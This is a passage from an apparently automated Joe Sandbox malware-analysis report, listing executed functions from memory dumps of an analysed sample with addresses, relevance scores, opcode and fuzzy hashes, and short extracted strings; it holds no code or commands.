                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ($+$/$/
                                    • API String ID: 0-225055995
                                    • Opcode ID: 3f4653349050ffc5fab187cbd2a63378dc3e69333a328f54fffd258d6d77a8b8
                                    • Instruction ID: b11e8add6d0eba0cf61dc118645ab4c2f880bc68f06630c7805ec9c74864e9a8
                                    • Opcode Fuzzy Hash: 3f4653349050ffc5fab187cbd2a63378dc3e69333a328f54fffd258d6d77a8b8
                                    • Instruction Fuzzy Hash: 6741D270D4862ECBEB68DF54C8987EDB7B2BF59341F1041BAC41DA6291DB386A84CF00

                                    Executed Functions

                                    Function 00007FF887AF35F5 Relevance: 7.7, Strings: 6, Instructions: 192COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "9f$r6f$r6f$r6f$r6f$L_H
                                    • API String ID: 0-1116992257
                                    • Opcode ID: 79509de047d352a929b0da1fa2f9e2a03b9f29fb9cf11c02bdd1b23a5dd0807f
                                    • Instruction ID: 74c467b9851a1c9d80ea0985cee019fbedf50da8e87dcd49aa853fd88e247346
                                    • Opcode Fuzzy Hash: 79509de047d352a929b0da1fa2f9e2a03b9f29fb9cf11c02bdd1b23a5dd0807f
                                    • Instruction Fuzzy Hash: 6061AC3291894A8FEB94DB68C8567ED7BF1FF5A390F4401B9C00DC7296DB686841CB42
                                    Function 00007FF887AF2195 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0Wp
                                    • API String ID: 0-545783698
                                    • Opcode ID: 3bfcbca5142f60376854055fa7edac57eab0167320022ffb84b93ba3d6977de5
                                    • Instruction ID: 509679b52d1def5c5e76f01a8bb6e655fca8ba6caee42436161c4d235f2659f5
                                    • Opcode Fuzzy Hash: 3bfcbca5142f60376854055fa7edac57eab0167320022ffb84b93ba3d6977de5
                                    • Instruction Fuzzy Hash: 3941173194DA8A4FE795D778985A2BD7BF0FF46390B0405BBD44CC71D2DD28A881C342
                                    Function 00007FF887AF37BA Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: b4f
                                    • API String ID: 0-3391181744
                                    • Opcode ID: 5626410ae092d9b2fa501a31bde4a30f541bd5d6649f5d74749859d462f934ef
                                    • Instruction ID: 4f8b51dd3b5cf3361675227e08573cf18c0a68c928e370ec7fde71ad2203ec2f
                                    • Opcode Fuzzy Hash: 5626410ae092d9b2fa501a31bde4a30f541bd5d6649f5d74749859d462f934ef
                                    • Instruction Fuzzy Hash: 62319E72A1990A8FE748DFA8E8153ED7BF1EB963A1F90417AC00DC72C6CBB91455CB41
                                    Function 00007FF887AF1718 Relevance: .3, Instructions: 258COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9fa1616d3db69b5a9d4631a19aaae8cc5587f8da503383b1131f3cfdd8395071
                                    • Instruction ID: 6499358198e5969f4ed95d6327990a1097597c4e5dec897fa072bb82de73fece
                                    • Opcode Fuzzy Hash: 9fa1616d3db69b5a9d4631a19aaae8cc5587f8da503383b1131f3cfdd8395071
                                    • Instruction Fuzzy Hash: 0F71AE32A58A498FDB88DE1CD8526BD77E2FF98744F14417AE45EC3282DE34A802C781
                                    Function 00007FF887AF1D7D Relevance: .2, Instructions: 187COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 807f526946f18c3787f727d448e7fb8aedac2c633a8fd95e7e33007a09147f6b
                                    • Instruction ID: 7977c1a8f670459460aaecf0a71de19734f898e5ff20513ec130a28888ebc614
                                    • Opcode Fuzzy Hash: 807f526946f18c3787f727d448e7fb8aedac2c633a8fd95e7e33007a09147f6b
                                    • Instruction Fuzzy Hash: 3A51BD31A18A498FDB4CDE1CC8556BA77E2FF98354B14467EE44EC3286CE34E802CB81
                                    Function 00007FF887AF31E5 Relevance: .2, Instructions: 165COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cdeada81670f8f4b10e3ec29a251f4ddeb80a10dce8d24bb6134a110e6c35c24
                                    • Instruction ID: 28b6e382d777028c91433fc23dbc50c79b332cda7aa0f308bd926b08d8395234
                                    • Opcode Fuzzy Hash: cdeada81670f8f4b10e3ec29a251f4ddeb80a10dce8d24bb6134a110e6c35c24
                                    • Instruction Fuzzy Hash: 29513774D4960E8FEB58EBA4D4566ECBBB1FF58351F50417AD009E7292DF38A984CB00
                                    Function 00007FF887AF33E0 Relevance: .1, Instructions: 76COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c42b6ea764a808d7b24a44075f05e3566ff286062211c68ea7664dff25f9cb75
                                    • Instruction ID: 9bf27d9661155ac42378ee06af4d018f17bf8528acb0f72615dd10ad969b64a9
                                    • Opcode Fuzzy Hash: c42b6ea764a808d7b24a44075f05e3566ff286062211c68ea7664dff25f9cb75
                                    • Instruction Fuzzy Hash: 75216D3188D78A8FD743EBB48C195A97FF0EF47351B0944FBD449CB0A2DA299489C722
                                    Function 00007FF887AF3575 Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c154f0b75d64ab9b9af40d3f598413a22c594a63637a3ea5d93c63151e93faf0
                                    • Instruction ID: 7bb66bb6e51c93e28a0af7829b4ef3ead89c587cf82cfc9c410fae82dd4659a5
                                    • Opcode Fuzzy Hash: c154f0b75d64ab9b9af40d3f598413a22c594a63637a3ea5d93c63151e93faf0
                                    • Instruction Fuzzy Hash: 5F21497494854E8FEB95EB68C45A6BD7BF0FF98344F4008BAD41DCB191EB38A584C741
                                    Function 00007FF887AF0A01 Relevance: .1, Instructions: 66COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4a5fa4a8408d56b0748b21a73c2e3b7955814517d33264f37f08b93d416fae09
                                    • Instruction ID: f7a389d446460c29b8a1a577016651ba53e296de3ba9c967b98b710f19eafe1d
                                    • Opcode Fuzzy Hash: 4a5fa4a8408d56b0748b21a73c2e3b7955814517d33264f37f08b93d416fae09
                                    • Instruction Fuzzy Hash: 1E118F7195950E8FEB90EB68888A2FE7BF0FF58390F4045B6D428C71A6EE38A544C741
                                    Function 00007FF887AF112D Relevance: .1, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 26c0a9936a15dd2af0b997cc146798fe11cd54e524790e583c921a03fa367dbb
                                    • Instruction ID: 4718bdf0cb6beabcf079bd5324f65511833f2986c31d06875be413e7ed9fc2ef
                                    • Opcode Fuzzy Hash: 26c0a9936a15dd2af0b997cc146798fe11cd54e524790e583c921a03fa367dbb
                                    • Instruction Fuzzy Hash: 95119D70948A498FEB99EB68C4592BE7BF0FF6A354F0005BED40AC6192EB295544C701
                                    Function 00007FF887AF0EFD Relevance: .1, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 35901ac393adf6289e903dd647d7c427fd75351cf724b9f664b4f5fd47d9cdfe
                                    • Instruction ID: a089c0748611a625da37a8386132c92ad948ab3b181047ff50eb5be1f9bf74df
                                    • Opcode Fuzzy Hash: 35901ac393adf6289e903dd647d7c427fd75351cf724b9f664b4f5fd47d9cdfe
                                    • Instruction Fuzzy Hash: F8114231E4890E8FEB54EB54C896BEE77B1FF54340F104275C01AD7295CE786985CB81
                                    Function 00007FF887AF2EF1 Relevance: .0, Instructions: 50COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ceea20dc05e4aa7609a475f28a7a54d0d7414ea5212ed1d844cde6bbb1a727c3
                                    • Instruction ID: 3fdee1bac1e0d20afbea624f46670d00f1fef208c682df278251b831df135aa9
                                    • Opcode Fuzzy Hash: ceea20dc05e4aa7609a475f28a7a54d0d7414ea5212ed1d844cde6bbb1a727c3
                                    • Instruction Fuzzy Hash: A7017C719A864A8FE751EB24884A2AD7BF0FF19350F0549B6D408CA0A2EA38A494C701
                                    Function 00007FF887AF05D8 Relevance: .0, Instructions: 50COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f4a2a7ba956978e3fbc55aa2de53bf14d8798a9b0f029414ab682172a8749630
                                    • Instruction ID: 05e038c3ab73c80b738f9f246ee58f4a844a900ae3c5f8f46b9ebe28e7790557
                                    • Opcode Fuzzy Hash: f4a2a7ba956978e3fbc55aa2de53bf14d8798a9b0f029414ab682172a8749630
                                    • Instruction Fuzzy Hash: 8101883094990E8FEB88EF24C05A6BE77B1FF58348F20087AD40EC7191CA36A590CB40
                                    Function 00007FF887AF28CD Relevance: .0, Instructions: 44COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a482e6dd602a2359401034d62e186a1ea2835a23405639d6366514c54ef2f036
                                    • Instruction ID: b82483864aecba0336ea8bcdf3828578ecd313d8e27bba35c7f5014872522324
                                    • Opcode Fuzzy Hash: a482e6dd602a2359401034d62e186a1ea2835a23405639d6366514c54ef2f036
                                    • Instruction Fuzzy Hash: 0D018B3098864D8FEB51EB74848A6FD7BF0FF19340F5148B6E408CB1A2EA38E584C742
                                    Function 00007FF887AF2F69 Relevance: .0, Instructions: 43COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ee1400a4bf294821f275d85d66c58927cfaabf6bc6c5ba1fb328868d77a05cf4
                                    • Instruction ID: aa03890b9c9a2e336bbb67780b19cb63522582f5f0f45d588c6f022f1b8910ff
                                    • Opcode Fuzzy Hash: ee1400a4bf294821f275d85d66c58927cfaabf6bc6c5ba1fb328868d77a05cf4
                                    • Instruction Fuzzy Hash: 6901843199D68A4FE751AB34885A1AD7BF0FF56350F0508F6D409CB0E6EE38A494C701
                                    Function 00007FF887AF0610 Relevance: .0, Instructions: 42COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b5731fa2ab9859aaf6a75f51b340200199f25e4b79c633f1c0612d8a6614d4ea
                                    • Instruction ID: 68e0fb04b552bfa217dd3eeff84de8efc5f50530f9c6f8d739955de94f52ed9a
                                    • Opcode Fuzzy Hash: b5731fa2ab9859aaf6a75f51b340200199f25e4b79c633f1c0612d8a6614d4ea
                                    • Instruction Fuzzy Hash: 5201693099890E9BEB58EB64D45A2BD72B0FF1834AF50087EE41EC61D1DF39A590CB41
                                    Function 00007FF887AF0608 Relevance: .0, Instructions: 42COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cf473f97ac5e8aeb6963413bd7f81f19a4949e89fe02f39262204ff552b73d36
                                    • Instruction ID: f43ba6dfa897d3596690ca83ee78bde01b3504ab972d08cd462f3a7e4bb1d132
                                    • Opcode Fuzzy Hash: cf473f97ac5e8aeb6963413bd7f81f19a4949e89fe02f39262204ff552b73d36
                                    • Instruction Fuzzy Hash: 69016930958A0E8FEB59EB64D44A2BE72B0FF18346F20087EE41EC61D5DF39A594C681
                                    Function 00007FF887AF1140 Relevance: .0, Instructions: 41COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dc475c73fae1ce2e12ff868a48f3282378eeb1eedfd512f09efb3d4cabc68787
                                    • Instruction ID: e1d71a84e429349959165ca7a9a1cbe456e3ea45d0871fd8cf83fa9d4298a5c0
                                    • Opcode Fuzzy Hash: dc475c73fae1ce2e12ff868a48f3282378eeb1eedfd512f09efb3d4cabc68787
                                    • Instruction Fuzzy Hash: F4F0DC30D58A1E8AEB98AA68D85A3BE77F0FF56364F00017ED419C20C0DF241014C601
                                    Function 00007FF887AF05D0 Relevance: .0, Instructions: 39COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f49fc49f9072e7587d3951095f17dd3b0d04d9f1fe279729f016040fd1ff2975
                                    • Instruction ID: 676186f976255131fc2869c5e6109f7d60672895c68a0af7d7e71cb718e53cad
                                    • Opcode Fuzzy Hash: f49fc49f9072e7587d3951095f17dd3b0d04d9f1fe279729f016040fd1ff2975
                                    • Instruction Fuzzy Hash: 82F06D3085A64E8FEB58EE24D4166FE77B0FF15348F50087AE80DC2191DA39A5A0CB81
                                    Function 00007FF887AF1CFD Relevance: .0, Instructions: 39COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e9cfb72d0a37f13157d3cb057d73fdef6abdd55c91c13fe3955d6c71566bf36a
                                    • Instruction ID: 7a32f9a7e434fbc95fb78b5d4c2dc54c01f5321c415d06334517db49b9c00278
                                    • Opcode Fuzzy Hash: e9cfb72d0a37f13157d3cb057d73fdef6abdd55c91c13fe3955d6c71566bf36a
                                    • Instruction Fuzzy Hash: 90018C3094A68D8FDB58DF24C4566BD7BB0FF59344F5004BAE80CC6192DB79D994CB81
                                    Function 00007FF887AF27E9 Relevance: .0, Instructions: 33COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b7d6d69900b984faffe425d4f30c473d25b831656b67c36185986036e539c384
                                    • Instruction ID: 9fff2de5433f50139efff825b3ed7d962df972d38be006f3cffe358692284e6e
                                    • Opcode Fuzzy Hash: b7d6d69900b984faffe425d4f30c473d25b831656b67c36185986036e539c384
                                    • Instruction Fuzzy Hash: 69F06D3084D3898FDB5A9B2488552ED3B70FF56205F4508BAE419C61D2DB299898C782
                                    Function 00007FF887AF285D Relevance: .0, Instructions: 31COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eab130d730f6caa97e99933f4a17f1aaa9450a0b11149971eac769b82466d2b3
                                    • Instruction ID: 1821b72cd1c4c208188dab298f40e528365ab1b18113e8635d8607aa58c93caa
                                    • Opcode Fuzzy Hash: eab130d730f6caa97e99933f4a17f1aaa9450a0b11149971eac769b82466d2b3
                                    • Instruction Fuzzy Hash: 2EF0BE309892498FEB599F2484562FD3BB0FF19305F4004BEE809C61D1DB399494C741
                                    Function 00007FF887AF3F66 Relevance: .0, Instructions: 18COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c426eb85eca6ac21900330bdedabb5b409d69e244e3d01691483efb13709912
                                    • Instruction ID: 45466f8545581a05223adc35c3fe9cb94e2ecc50a98608c83a4a8bdfa761df19
                                    • Opcode Fuzzy Hash: 0c426eb85eca6ac21900330bdedabb5b409d69e244e3d01691483efb13709912
                                    • Instruction Fuzzy Hash: 9BE02B70E1992D8FDBA4EA088885BAEB6B1BF49342F1005E9844DE6280DA746E80CF44

                                    Executed Functions

                                    Function 00007FF887BB3888 Relevance: .7, Instructions: 713COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e07268f2e593464f7d77095028d726525cbf3efdd9d18e1b8dd262ff6d2d461d
                                    • Instruction ID: c15b53a99b4c99a5afcb58ed025323443a00421b730e5e14d19c7edf10bd3ede
                                    • Opcode Fuzzy Hash: e07268f2e593464f7d77095028d726525cbf3efdd9d18e1b8dd262ff6d2d461d
                                    • Instruction Fuzzy Hash: E3429130948A8A8FEB45EB74C8596FE7BF1FF19351F0005BAD829C7192DB38A554CB42
                                    Function 00007FF887BB4FA0 Relevance: .4, Instructions: 374COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d3fdbddbc3c95cf620b5d05bdaeb119dad1629a1a46c78886f3b3ed3a2abdec7
                                    • Instruction ID: 302aacb31bb04c9255c4a32ad0abf7b53882c8499684d77c7786a735875d74d8
                                    • Opcode Fuzzy Hash: d3fdbddbc3c95cf620b5d05bdaeb119dad1629a1a46c78886f3b3ed3a2abdec7
                                    • Instruction Fuzzy Hash: 7AD1A130959A8E8FEB85EB68C8596FE7BF1FF19340F4005BAD819C7192DE38A544C742
                                    Function 00007FF887BBBDCB Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %$UAWA
                                    • API String ID: 0-2873630224
                                    • Opcode ID: 84d101f4f4e6450e3a315d8a9787d0333d4218da9a765e6ff7191b80a288aed9
                                    • Instruction ID: 43d275357f7268e22372ab77f0ac5777b802f3fd1b747108a19189becfd7a941
                                    • Opcode Fuzzy Hash: 84d101f4f4e6450e3a315d8a9787d0333d4218da9a765e6ff7191b80a288aed9
                                    • Instruction Fuzzy Hash: 3B71A030D5894E8FEB95DBA4C8546BEBBB2FF48384F50047AD51ED7192DE38A841CB41
                                    Function 00007FF887BA35F5 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: L_H
                                    • API String ID: 0-402390507
                                    • Opcode ID: 62b256636a3a5f0a6c38c3f246d908c5d8e8f696395b6141a10f75d1f742ded7
                                    • Instruction ID: a2f9ad582e987a619e102eafb7210dce7191a9d7fc3c4a0c2c3dc7c0a119d0f8
                                    • Opcode Fuzzy Hash: 62b256636a3a5f0a6c38c3f246d908c5d8e8f696395b6141a10f75d1f742ded7
                                    • Instruction Fuzzy Hash: 8E518D71D48A4D8FEB98EB68C8557ADBBF1FF5A380F54017AC00DC7296DA286801CB42
                                    Function 00007FF887BBB722 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: m
                                    • API String ID: 0-1228489174
                                    • Opcode ID: 137d54c667630ae441dc623b3e392005d4178579799fb2fe1ee03b148a166022
                                    • Instruction ID: 8ab8b36cfec3370b603a068120ac63d68cdae060c255a832cb768d9b3bd7ba09
                                    • Opcode Fuzzy Hash: 137d54c667630ae441dc623b3e392005d4178579799fb2fe1ee03b148a166022
                                    • Instruction Fuzzy Hash: 6C11A26098D2C29FF32B537954246BE3FB2BF43398F1941FADA898A4E3C95C1445C752
                                    Function 00007FF887BB46F8 Relevance: .6, Instructions: 567COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2424267228ed9ec9ed7df650109a3fbb4dba92668691d9455596e532884b8491
                                    • Instruction ID: a7583f14bfeac604eaab6b35c6974c9b3ea3ccf473c13a463f02b2bd34e3d875
                                    • Opcode Fuzzy Hash: 2424267228ed9ec9ed7df650109a3fbb4dba92668691d9455596e532884b8491
                                    • Instruction Fuzzy Hash: 1912A030C5DA8A8FEB95DB7488193FE7BF0FF19351F0405BAD828C6192DA38A558C742
                                    Function 00007FF887BB4798 Relevance: .5, Instructions: 518COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 13bc3140c1c30b5b1216a626d81ab7ba07a7aa1eab52ad4e6c41cac5efa07b13
                                    • Instruction ID: 5dc646d113026babae880e81c055811e3f0923d5b4d3fe62063f1e1c67e02025
